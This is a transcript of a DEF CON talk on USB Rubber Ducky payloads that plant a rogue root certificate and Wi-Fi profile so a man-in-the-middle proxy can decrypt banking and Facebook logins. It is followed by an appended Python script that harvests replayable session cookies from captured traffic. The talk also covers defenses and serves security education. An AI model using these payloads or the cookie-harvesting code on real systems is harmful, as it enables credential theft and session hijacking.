Hello, everyone. Welcome. Good afternoon. Thanks for coming. Thanks to DEF CON for having me. My name is Jeremy Dorrough. Today I'm going to present to you guys two different variants of an attack that I made for the USB Rubber Ducky. What we got here? One minute. Or is that just their screen? Are these screens screwed up too? I know just that one. Alright, cool. Alright, so we made two different payloads for the USB Rubber Ducky that will decrypt Wi-Fi communications. Yeah, so before we get started though, quick disclaimer. I'm here on my own behalf. It's my own opinions. Not my employer's, no one else's. So we get the legal jargon out of the way. Oh, so what are we doing here? There we go. Sorry guys. Alright, so about me. A little bit of background. More than a decade of experience in the IT security industry. In those 10-plus years I've worked for a couple of different sectors. I started my career out with the Department of Defense, working for the Army at a data center hosting both classified and unclassified material. Left out of there to go work in the energy sector defending a nuclear power facility. And then currently I'm working in the financial sector as a network security engineer for Genworth Financial. And just a little side note there, a little fun fact: as a hobby, I enjoy building, driving and destroying demolition derby cars. So if there are any gearheads in the audience, feel free to find me afterwards. We'll talk cars. So the presentation outline, what we're going to talk about. From a high level we're going to first talk about what the USB Rubber Ducky is, for those who are not familiar. Then we're going to talk about how the attack actually works. And then we're going to get into the details of each of the different payloads. So we'll first talk about the keyboard payload. And then we'll talk about the one that involves both keyboard and USB mass storage. I'll demo the second variant of the attack.
And if we have any time for questions, maybe we'll take some questions, but it's probably going to take the full time. All right, so again, for those not familiar with the Rubber Ducky, a simple description of what it is. Think about if you were able to take a keyboard and apply some type of logic or some type of memory to it to tell it what to send to a victim's machine when you plug it in, and you ultimately have the USB Rubber Ducky. So these devices are sold by Hak5, for those not familiar. They're actually selling products here. Go by and support them. Really good group of guys. I think they're like 40 bucks or a little better than 40 bucks. So it's pretty cheap. So here's what the Rubber Ducky looks like. You'll notice that it is a very common form factor. So notice there on the far right for you guys. You know, if you've been to any of the trade shows, like any of the IT security stuff, typically as vendors hand out swag, a lot of times that's the actual form factor. So if you've gone to some of those, look and you'll probably have one that looks very similar to that. Inside the enclosure, you'll see that it has a microSD card storage area, as well as a little microprocessor, a little 32-bit chip. And again, that's what kind of drives the memory part of the brain from that previous slide. And to kind of talk about the different ways that the Ducky behaves, it comes shipped with the Duck firmware, which is that kind of first bullet there. And again, that is just keyboard input. But there's also, out there, FAT Duck, Detour Duck. But make note of that last variant of the firmware as well. That involves having both USB mass storage at your disposal when you plug the device in as well as the programmable keyboard. So a lot of powerful things can be done once you start adding mass storage. We'll see that in a demo later. But for those that are like, you know, thinking, well, this must be a Hak5 presentation.
He's trying to peddle their products. You don't have to go with the Hak5 Rubber Ducky. There are other options out there. Samy Kamkar, he's actually here, spoke to him last night. So he's got a presentation later today. I recommend you guys support him. Really smart guy. But he developed the USBdriveby. So he does the same kind of mentality with the Teensy device. So check his stuff out if you don't want to spring for the 40-some-odd dollars for the Rubber Ducky. As well as last year at Black Hat, Karsten Nohl and Jakob Lell did the BadUSB, for those that are familiar with that term. And then later at DerbyCon, Adam Caudill and Brandon Wilson released code so that you can take an off-the-shelf variant of a flash drive, flash their firmware to it, and more or less it will run the same scripting language that the Rubber Ducky runs. So that's more or less free if you have those flash drives laying around. All right, so how this attack works. This slide just depicts the victim having a wireless connection to the little radio there and you see the lock. So any SSL connections they have are working as they should. Everything's encrypted. Anything that's supposed to be encrypted is encrypted. It's the standard connection before the attack. Then comes the Rubber Ducky. Once the Rubber Ducky, the USB flash drive, is plugged in, the first thing that's going to happen is there's going to be a trusted certificate that's loaded on that victim's machine. After the trusted certificate is loaded, it will then move the wireless connection over to a man-in-the-middle machine, which I will be running. If you think about this in your head, what just happened, not only are we now man in the middle, but since we provided that key, there's nothing they can encrypt. It's kind of a bad situation for that victim. First question I had when I bought it was, is this a novelty device? It's great to rickroll your buddies with it. That's cool.
But does this thing really have a place in the corporate environment for, say, a real CT, an actual pen test? Or is this a real useful tool for a black hat, for that matter? I was kind of astounded to see these numbers. You may have heard these before, but DHS had the same thought. They paid a third party to perform a study where they dropped flash drives around public areas, whether it be smoking areas, walkways, what have you, and they found that an astounding 60% of people plugged them in once they picked them up. Well, that's scary enough, but then if you look at the last bullet there, if they had an official logo on it, that number jumped to 90%. So the moral of the story here is that you really don't need any clever social engineering for this attack to work. I mean, if someone really wanted to be bad and do this attack, for $400 you've got 10 of them, someone's going to plug it in, your odds are pretty good. And speaking of official logo, if you recall the form factor that the Rubber Ducky ships in, this is just a quick Google search of "marketing USB drive" or something. Ta-da! First one that came up, the exact same form factor that the Rubber Ducky ships in. For a couple bucks, you can put whatever logo you want on your Rubber Ducky because it's just a little shield there that connects to it. And you're up to your 90% mark according to the DHS study. So pretty useful stuff. I kind of want to talk about now why I actually made this payload. You know, there are plenty of good ones already out there. The Rubber Ducky is nothing new. The product's been out there for a while now. And Darren, the guy that runs Hak5, his GitHub is just full of really good payloads that people have written. But what I found is that most of those, if not all of them, would be stopped by the modern defenses that are deployed in most enterprise organizations.
So I'm not talking about, you know, if you're trying to attack the random victim at Starbucks. I'm more focused on corporations and doing this thing in, you know, a more secure area. And the first one I'll touch on there is antivirus. So a lot of the payloads that are out there will try to pull down a tool of some type. Whether it be, you know, Netcat, or try to do some Meterpreter reverse shell, what have you. Well, you know, that's cool and all, but if you pull those down on a company asset, you know, your antivirus is going to light up like a Christmas tree and it's going to stop it in its tracks. I mean, it's too well known at this point. The next bullet there, web filters and proxies. So some of the other attacks, what they'll do is they'll try to make you go out to some open storage place, you know, Dropbox or Box or something like that. Well, most organizations, at least if they're, you know, more on the secure side of things, are going to block those style sites. They're not going to let you go to just any open storage to pull down any random file you want. So that's going to be stopped. Same kind of mentality below with the FTP whitelist. Some of the attacks try to pull down files through FTP. Again, most companies, if they're at the level of any security knowledge at all, they're not going to just allow you to FTP anywhere from any asset in the organization. And then the last bullet there has nothing to do with corporate security. I'm sure most of you guys are familiar with HSTS, but for those that are not, it's kind of a tool that was designed just to stop this style of attack. So the old-school way of doing man-in-the-middle attacks would be, you know, once you got in the middle of the communication path, you would tell the victim, you know, just go ahead and talk to me in clear text. You know, trust me. Talk clear text to me. You know, you want to talk encrypted to your banking site.
Well, I'm telling you to go ahead and load it in HTTP so I can harvest the credentials. And then on the side that's talking to the real banking website you would talk encrypted. And it worked well for a while until things like HSTS came along, which is an actual browser-based security mechanism. It says if you're a member of, or you're on this list of, HSTS-enabled sites, no matter what the man-in-the-middle machine tells you, you must always use encrypted traffic. And that becomes a problem because it kind of thwarts the way that the old-school way of attacking took place. And again, all your big sites are doing that. You know, a lot of your paid sites, like you see PayPal, and your social media sites. Even DEF CON implemented it this year. So I guess DEF CON has got some super-secret information they don't want someone to get. So let's talk the attack. Enough kind of pre-talk. So the first step is to actually set the man-in-the-middle machine up. Because you have to have something for the victim to connect to. Right? So this is not the focus of the attack, so I'm going to kind of breeze through this stuff. Just to give you an idea of what I used when I set up the demo you're going to see in a minute. I used hostapd for the wireless radio. I used dnsmasq for the DNS server as well as the DHCP server. iptables to kind of direct the traffic over to a proxy. And I mentioned the MANA toolkit. So those guys actually have developed some really cool scripts that I used, and I kind of just adjusted their stuff to make it work the way I wanted it. So I mentioned proxies. There's iptables that moves stuff over to a proxy. So you've got to think about it. Once you get the connections coming into your man-in-the-middle machine and you've got the radio, it's listening, people are connecting to you. You have to have some way to manipulate the traffic or at least use the traffic. I mean, what's the point of sending it through you if you can't do anything with it.
So you're going to have to set up some type of proxy. In my example I use Burp Suite. It doesn't mean you have to use Burp Suite. It's just easiest in my opinion. You can use sslstrip, Squid, Mallet, whatever. I do make note here that whatever proxy you want to use for this type of attack, make sure you know how to pull the certificate out, the actual signing authority it's using. Because we're going to have to convert that certificate to a base64 encoding. And I'll get into that in a little bit. So for those that are not familiar with Burp Suite, I'm sure most of you have at least seen it. The configuration I'm using today is very, very simple. I've just got it listening on all interfaces, just picked the 8080 port. And you'll see there that "invisible" box, as they call it, is checked. But in industry terms, that's a transparent-mode proxy is all it's doing. And I mentioned you had to export your certificate. Well, that's what the little radio, I mean the little button below there, "CA certificate," you click there and you'll kind of go through some dialog boxes to export the certificate. And when you do that it's going to come out in DER format. So again this is not a talk about certificates, but at least I want to touch on this. The certificate, if it's in DER format, you'll notice in that top window there, that's text that I can't enter by keyboard. So I want to make sure I convert that certificate to something that my Ducky can type in easily. So use OpenSSL, convert that DER format to PEM format, the base64 encoding. And if it's done right it should look something like in that bottom window. So it's human readable. All letters and numbers. So now we have the man-in-the-middle machine. So let's talk about the payload itself that's going to be sent to the victim. So what it's going to first do, it's going to bypass the Windows UAC and open a command prompt window.
If the user is logged in with admin credentials, it's going to get admin credentials. If they're logged in with user credentials, they're just going to get user credentials. In the test I'm doing today I actually have admin creds, but I will make note that this will work with user credentials without admin creds. It's just going to have a few extra pop-up boxes along the way. The second step it's going to do is create that cert file, so you're going to create a certificate from keyboard input. The same certificate we exported a few minutes ago. Then it's going to add that certificate to the trusted root store using the built-in tool certutil. Then it will create a new wireless profile and then connect to that wireless profile. And then lastly it's going to clean up its tracks. So it's going to delete the files that it made in the process. Alright, so before we actually look at the code, I kind of wanted to let everyone at least understand how simple this thing is to really write. So DEF CON gave me a lot of credit by making me talk to you guys, but really it's pretty simple stuff. Again, very straightforward. DELAY, delay in milliseconds. STRING, what you're actually typing into the machine when you activate the payload. And then all your command keys like ENTER; GUI is the Windows command key. And any question on that, the GitHub that Darren keeps up has pretty much all the documentation needed for any of the commands that it supports. Alright, so here it actually is, the first step in the payload. Kind of broken it out here a little bit. So you'll see how the code kind of works. DELAY 10000, so that's 10,000 milliseconds. That's 10 seconds. And the idea behind that is when you plug the device into a machine the first time you're going to see Windows spinning there, loading drivers, loading drivers, loading drivers. Hopefully it's done in 10 seconds and then it's going to issue the GUI r command. For those not familiar with GUI r.
That's going to open a Run dialog box. And it's going to delay 200 milliseconds to allow time for that box to pop up. And then it's going to type a little PowerShell command, Start-Process cmd -Verb runAs. All that does is open that box with admin credentials if possible. And a little side note here. You'll see now I put a little side note that Windows 10, and this is as well as 8, you don't have to do that PowerShell command, for those that have got the Windows 10 and 8 thing. If you just do GUI x and then type a, it opens up an admin command prompt. A little side note. So next up, we're going to have to create that certificate on the victim's machine with keyboard input. And the way we're going to do that is we're going to use a built-in Windows tool called copy con. For those that are not familiar with copy con, it's copy con filename, and anything below is concatenated to the file. You break out of it and now you have a certificate. And I had to put the obligatory picture of the hacker in the presentation. But I noticed earlier when I was going over my slides, this poor guy was having a hard time typing because he's got big, thick winter gloves on. So I don't know. That's what Google searches for hacker. Anyway. So we're going to use, in my opinion, the climax of the attack. So this is the part where it's actually doing bad things. certutil -addstore -enterprise. So that's adding to the machine root store. It's adding that certificate we just created. So if this command succeeds, game over. Lastly, we're going to create an XML file. And again, for those not familiar, Windows handles wireless profiles with just a little XML file. So we create an XML file and then, after we create it, we then connect to it with the netsh command. Again, pretty straightforward stuff. And lastly, we'll just delete that XML file and that certificate file we created. All right. So here is what it looks like from the attacker's machine. Right. So this is, again, Burp Suite.
We're looking at the proxy kind of view there. And I've kind of highlighted there. We're typically going to be interested in POST commands. So I've kind of looked at a POST command there to Wells Fargo. I'm not picking on Wells Fargo. So hopefully you don't sue me. But any bank would work. And you'll see there at the bottom of the details, you've got user ID and password. Clear text. Right. So that poor person's bank was just compromised. And alternatively, this is what it looks like from the victim's point of view. There have been no pop-ups, no warnings, no errors, no issues, no indication there was anything wrong. And I've even kind of opened up the certificate details to show that this certificate was signed by, you probably can't read that, but it's issued by PortSwigger. For those not familiar, PortSwigger is the company that actually writes Burp Suite. So they put their name in the certificate. But yeah. So really bad day. Internet Explorer got the best of them. But I'm sure some of you in the crowd are like, well, I don't ever use Internet Explorer. I'm cool. I use Chrome. So there's no way you'd get me. Well, here's Chrome. Same deal. Look at their credential. I mean, look at the certificate details. You'll also see signed by PortSwigger. And again, same story. No pop-ups, no warnings, no errors, no issues. It's pretty much transparent to the user. There's no way, by at least the certificate anyway, you'd ever be able to know something bad had happened. All right. So again, they have no more money in their bank account. All right. Firefox though. How about Firefox? The special snowflake that Firefox is. Yeah, yeah. Yeah, clap. Yeah. It was a bad day for me. So I'm glad y'all think it's funny. Yeah. So Firefox. And I'm sure some of you know already why this is the case. So Firefox decided they're not going to trust the Windows key store and trust store. They're going to implement their own key store and trust store.
So those commands that I issued earlier with certutil, that's all for the Windows certificates. NSS has a tool you can download to actually manipulate Firefox certs, because they have their own key store and trust store. But it's not installed on a typical distribution. Therefore it would be very hard to use on a victim's machine. So I kind of banged my head against the wall for a while and, you know, my face looked a lot like that image there for quite a bit. Trying to figure out how in the world to get this to work. And I just couldn't come up with anything clever. So that kind of brings me up to the next variant of the attack, the Twin Duck that I referred to earlier. So Twin Duck firmware, again, just a recap, it mounts both a USB mass storage device as well as that same programmable keyboard mentality we just had before. So to use the Twin Duck firmware, obviously you're going to have to reflash the device. Not a big deal. The other thing is that there's other stuff out there on how to do that, very straightforward. And I will make one little side note here that if you're planning on making some attacks using the Twin Duck firmware, it's not really designed for really fast I/O. So don't be trying to load some massive application up on your microSD card and pull from it through the command line, because it's going to probably behave a little differently than what you expected. Just a quick side note there. So let's start this attack. What's different this time? We have to set it up. First steps are to create a new Firefox key store and trust store, and the easiest way to do that is go ahead and infect your own browser. So go ahead and open your own Firefox up and take that certificate that you just exported from your proxy, load it into your own browser. And I've kind of listed here how to do that, I'm sure you all know, but go ahead and click "trust this CA to identify websites." So that way PortSwigger can sign anything through Firefox. Okay.
After you do that, then you're going to pull your key store and trust store and copy them over to your microSD card. And it's located in the path there listed on the screen. And that variable works for pretty much any basic install. You'll see it uses variables as well as a wildcard, *.default, because it's going to give it some crazy number string .default. So that path right there, if you just entered that into your machine right now, it would go to your Firefox profile. And you're going to get those two files that are listed at the bottom. You're going to get the key3.db and the cert8.db; that's your key store and your trust store for Firefox profiles. Alright, so again, from a high level, how does this attack work now? We've done the pre-work to set it all up. Same as before, it's going to open a command prompt with admin creds if it can get admin creds. It's going to then, this time, a little bit different, it's going to create a script to identify where that mass storage was mapped. Alright, so again, we've got to think about this. We're going into it blind. We don't know what's going to be on the machine once it's plugged in. So it could be mapped to the E: drive, F: drive, you know, who knows. So a little script tries to find where the Ducky USB mass storage is located. Then it will create another script, a little VBS script that will run a batch file invisibly. And when I say invisibly, it's just running in the background. And the idea behind that is it's quicker to write a script on the screen, because it's all done with keyboard input, than it is to write the whole batch file out. And it just gives you a little less time that text is kind of scrolling across the screen. But what that batch file is going to do, it's going to first add, just like before, it's going to add the Windows trusted root certificate. It's going to then overwrite the user's Firefox cert and key store. And then it's going to create a new wireless profile, connect to it, clean up.
So here's what that batch file looks like, just for those that are looking for the code part of the talk. You'll see here, we obviously kill Firefox, we don't want to do anything while it's running. Same commands, add it to the Windows enterprise store, the machine store. And then you'll see that it overwrites the Firefox profiles. And as a quick view, here's what the microSD card looks like on my device I'm going to do the demo with. You'll see the XML file, which is the wireless profile. You'll see the cert file, which is what we load into Windows. You'll see the cert and key files for Firefox, as well as the batch file we just looked at. So those are the files that are needed to run in the Twin Duck mode. So again, we'll go back to looking at what it looks like from the user's point of view or the victim's point of view. There's Internet Explorer. Yeah, got them. Chrome, same story, no more money in their bank account. Firefox, yay Firefox. Yeah, sneaky bastard, got you. So you'll see it's also been signed by PortSwigger. We got them. Again, because we loaded those trusted certificates into their own key store and trust store. So at this point, I more or less consider the attack successful. We've got all three modern browsers and yeah, they've all been pwned. So with that being said, thank you, thank you. So we'll kind of dive into the demonstration now. I kind of want to set this up so it makes somewhat of sense, because I obviously don't have a nice environment here to have someone over there getting attacked and show you guys what's going to happen, so hopefully no one in the crowd will be that guy that tries to mess up my SSID, please. If you do, whatever, I've got a video, but I'd rather do it live. So please don't screw with it. There's going to be the Windows machine which I'm presenting from; that's going to be the victim.
So you'll see the Windows machine where I'll actually apply the Rubber Ducky payload, but there's going to be a Kali Linux box that's going to have a Debian background to kind of represent which is which. It'll be a Debian-background VM that has, I've got a bunch of USB connections up here, I can't really show you, but I've got a USB connection into a hardwire out to the internet as well as a wireless radio that is going to be hosting the SSID from the VM. And when the payload is deployed, hopefully the built-in wireless on the Windows machine will connect to that wireless radio. So it's all kind of all-in-one, but it should depict what the attack would look like. Alright, so let's do that now, without further ado. So that's what the Windows machine is going to look like. I'm going to change it so you can see the machines again. You should be able to see my desktop now. Alright, so here's going to be the victim, and let's go ahead and pull up super secret password. So before I actually get started, my resolution is all whacked out now, but this is the script that I was talking about, the MANA toolkit that I kind of modified. So again, for anyone that wants to take note, it's using hostapd again, using dnsmasq, and then using some iptables to redirect traffic. Alright, so let's actually do that. Let's kick that off. Actually, before I kick it off, let me show you again, here's the, I've already got Burp Suite up and running, so it's just listening on any interface on port 8080 and it's in transparent mode, and there's where again you would go to export those certificates. Alright, so let's go ahead and run that script. "Hit enter to kill me," that's a little brutal. Okay, so at this point what I should see if I were to look, yep, alright, there's the SSID broadcasting. It's actually trying to connect to it. I'll disconnect from it; once it's just proved that this does work, let's disconnect from that. So now again, what I'm going to do is I'm going to restart the payload.
So this would be indicative of me plugging in. I'm a dumb user that picked it up and I decided that, oh, I found a nice flash drive, let me see what I can do with it. Alright, 10 seconds, this is where drivers would be loaded, but I already had the drivers on the machine. The payload has now started and it's now done. So that's how long it takes to do its magic. Alright, so there you'll see now it's connecting like it's supposed to be doing. It just takes a little bit. Alright, so you guys are being nice to me, not kicking me off there. Appreciate that. So what we're going to do now is, and again you guys already probably know damage is going to be done now that I've got this connection in this shape, but just for grins, go over to a Facebook account that I created just for this presentation here, so please don't own my Facebook account. Alright, and then we'll also go again, poor Wells Fargo. I could use any other bank, but they're not my bank, so that's why I chose them. Alright, so let's go for Defcon user and some super secret password, login. I hope to God this is no one's password, that would be awful. Let's see here. Alright, no, obviously it didn't work. Okay, perfect. So let's kill out of that. Let's just demonstrate. Here we go. Okay, we got some data, so the attack is working as we would expect. So let's first look at Wells Fargo. You'll see, like I had in the slides, there's the authentication packet. You'll see the POST, the auth logon. And I'm just going to hit the parameters here and I'll scroll a little bit. I hope you can see that. Defcon user, password d3fcon23, so yeah, let's go ahead and transfer all the money out of that account. Got them. Alright, thank you. And now you may be kind of scratching your head like, whoa dude, you forgot to put a password in Facebook. Good luck getting that password now.
You messed the presentation up, because it was one of those little checkboxes, "keep me logged in," which I think we all kind of know what that means: it's using authentication cookies. That actually may be even worse because, for anyone who knows anything about Facebook and how they do their authentication cookies, let's see here, drag it up so you can see it a little bit better. But like every packet that you ever send to Facebook, you'll see this datr cookie. That's your authentication cookie. So every time you do anything in Facebook it just sends it over and over and over. So I can click on pretty much any of these posts and you'll see, yeah, look, there it is again. And there it is again. So what we'll do is we're going to go ahead and say, let me just have those cookies for a minute. And then I'll go over here to this account and, just to prove there's no shenanigans going on, I'm not logged in. Yeah, see, I just refreshed. No one's logged in here. But with the help of a little tool, for those that are familiar with Greasemonkey, it's a scripting tool, and I've got the Cookie Injector script loaded. If I go in here, let's go ahead and take those cookies I just stole and paste them in. Well, thank you. Alright. So now we have hijacked the session. Got you. Right? Thank you. So, and again, the point being there is it's not that Facebook's really your end goal in your attacks, but there are so many sites now that are using authentication cookies. I think that Facebook kind of just drives the point home that anywhere that uses authentication cookies or passwords, it really doesn't matter. Once you're in the encrypted traffic, the data is yours. Alright, so let's go back to the presentation. I think it's going to, let's see here. Wait for it. Wait for it. Got it. Alright. So now, since, like I told you guys at the beginning, I'm not a pentester. I'm not a security researcher. I am a security engineer. So I am paid to defend against these attacks and not create them.
So it's only the fair and responsible thing that I talk about how to stop this kind of attack. Alright, so the first bullet I want to touch on here is wireless intrusion prevention systems, so WIPS systems, for those not familiar with those. They're very powerful, and this style of attack would not work because as soon as I'd spin up that rogue AP it would start flooding me with deauth packets and it just wouldn't work. So if your organization employs some type of WIPS environment you'd have to find some other mechanism to get the traffic to you other than through wireless. Disable mass storage devices. This is becoming more common just because of, I guess, there's lots of these style attacks. Not to mention DLP concerns. People are starting to disable mass storage, but that's also kind of a bummer if you're trying to do that second variant of the attack, because if you don't have mass storage available you can't get all three browsers, at least the way that I did the payload. And take that kind of mentality a little step further, a little more extreme. Some companies even disable USB ports entirely. That would certainly limit the attack, because none of the USB-style attacks should work if you turned that on. And then this slide, I mean this bullet, I put it in there. Frankly, that bullet could be in any DEF CON talk given this weekend: user training can always be encouraged to be more responsible with X. Just today it's USB usage, because that's what I'm talking about. So yeah, you can always use more user training to encourage responsible use of technology. Multi-factor authentication. Yeah, so if I was able to pull this attack off on you and you're using some kind of one-time-use password or some token-based password, it's going to be very difficult for me to reuse that credential. So yeah, that's another check in the box for why you should use multi-factor authentication.
And the last one here, it may not be quite so obvious, but those familiar with cloud proxy agents: a lot of organizations are now starting to deploy them on all the corporate assets. What that does is it requires the company asset to talk directly out to a cloud resource for their proxy exceptions, and typically it has some type of authentication mechanism built into that. So if I got in the middle of that communication it would probably just break. It just wouldn't allow you to go anywhere. It wouldn't decrypt anything because it would have broken your connection. So a couple other things here to consider. I used wireless as the mechanism of getting the data to me, but that certainly doesn't have to be what you use. You could set up like a proxy listener out in the cloud, and instead of changing wireless settings you could go in and say, let's monkey with some of the proxy settings to have it, no matter if it's hardwired, wireless, whatever, always connect out to, say, an AWS proxy listener, and you could have the same kind of attack take place. And the benefits there are, one, again, hardwired or wireless, but you also don't have to be in physical proximity. So you could deploy this thing and then no matter where they went it would be connected out to a cloud listener. And you could also increase the authenticity. And what I mean by that is, again, I made this as just a proof of concept; the files are labeled what they are. You could certainly label them more suspicious things that people would really be trying to click on. Like if I was trying to get more authentic I'd probably put in a file that says like "salaries" or something, and I'd corrupt it so they keep trying to open it, just to buy a little more time on that screen before they thought something was fishy. As well as, we talked about putting a label on the device: you could print out whatever label for the company you were trying to attack, so "Company X," and put that label on it.
Another note here: the syntax will need to be adjusted slightly for whatever your victim base would be. And the reason I say that is certain OSes are going to have different dialog boxes pop up at different times, warnings pop up at different times, as well as timers. So if you try to get very aggressive on your timers, on when things fire, and you plug it into a really slow old machine, the timers may not work out right and it'll break the whole attack. So you gotta really play with the timers, play with the syntax, but the attack should work pretty much regardless of any version of Windows. And just a quick little shout-out for the guys at Hak5. They have a forum out there for people to share and collaborate on new payloads. It's a pretty active community, so if you're thinking about doing this style of attack or you're looking at new ways to get into this kind of thing, I recommend you go check them out, because that's where I got a lot of ideas and some of the code that I used for my attack. And with that I'll finish here with: please, any questions you have, email me. I'm not going to try to do the question thing here in this forum; it's just too many people. But feel free to bring any questions, find me out in the public areas, and with that, thank you guys all for your attention. I appreciate it.
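As an added example (this is not the speaker's code or demo), the following script shows the cookie-harvesting step behind the Facebook demo above: once the rogue AP or cloud proxy has the traffic in the clear, an attacker parses each HTTP request, keeps the cookies that are sent with every request to a host and never change, and serialises them as the Cookie header a tool like the Greasemonkey Cookie Injector takes. The HTTP requests, host names and cookie values are constructed for illustration and are not real captures.

```python
"""
Added example, not from the talk: harvest a replayable session cookie from
captured plaintext HTTP requests and build the Cookie header to inject.
All requests, hosts and cookie values below are constructed for illustration.
"""
from collections import defaultdict

# Constructed sample capture: requests as they look after the rogue AP or
# proxy has stripped TLS. Cookie names and values are invented.
CAPTURED_REQUESTS = [
    "GET /home.php HTTP/1.1\r\nHost: www.example.com\r\n"
    "Cookie: datr=AbCd1234; locale=en_US; c_user=1001\r\n\r\n",
    "GET /posts/42 HTTP/1.1\r\nHost: www.example.com\r\n"
    "Cookie: datr=AbCd1234; locale=en_US; c_user=1001; presence=active\r\n\r\n",
    "GET /style.css HTTP/1.1\r\nHost: static.example.com\r\n"
    "Cookie: datr=AbCd1234\r\n\r\n",
    "POST /ajax/like HTTP/1.1\r\nHost: www.example.com\r\n"
    "Content-Length: 0\r\nCookie: c_user=1001; datr=AbCd1234\r\n\r\n",
]


def parse_request(raw: str) -> tuple[str, dict[str, str]]:
    """Return (host, {cookie_name: value}) for one plaintext HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    host = ""
    cookies: dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value
        elif name == "cookie":
            for pair in value.split(";"):
                k, eq, v = pair.strip().partition("=")
                if eq:
                    cookies[k] = v
    return host, cookies


def harvest(requests: list[str]) -> dict[str, dict[str, set[str]]]:
    """Map host -> cookie name -> set of values seen across the capture."""
    seen: dict[str, dict[str, set[str]]] = defaultdict(lambda: defaultdict(set))
    for raw in requests:
        host, cookies = parse_request(raw)
        for k, v in cookies.items():
            seen[host][k].add(v)
    return seen


def replay_candidates(requests: list[str], host: str) -> dict[str, str]:
    """Cookies present on every request to `host` with a single stable value.
    These are the ones worth pasting into a cookie injector; cookies that
    appear only sometimes or change per request are dropped."""
    per_request = [c for h, c in map(parse_request, requests) if h == host]
    if not per_request:
        return {}
    common = set.intersection(*(set(c) for c in per_request))
    stable: dict[str, str] = {}
    for name in sorted(common):
        values = {c[name] for c in per_request}
        if len(values) == 1:
            stable[name] = values.pop()
    return stable


def cookie_header(cookies: dict[str, str]) -> str:
    """Serialise as a Cookie header value, the form the injector expects."""
    return "; ".join(f"{k}={v}" for k, v in sorted(cookies.items()))


if __name__ == "__main__":
    wanted = replay_candidates(CAPTURED_REQUESTS, "www.example.com")
    print(cookie_header(wanted))
```

Two practitioner caveats follow from this. First, the harvested cookie is a post-authentication artifact, so a one-time password at login does not by itself stop its replay; the defense is short session lifetimes, binding the session to client properties, and (above all) not having the traffic in the clear. Second, a cookie that is stable across every request is exactly what a defender should look for in proxy logs: the same session token suddenly appearing from a new client address or user agent is the replay signature.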
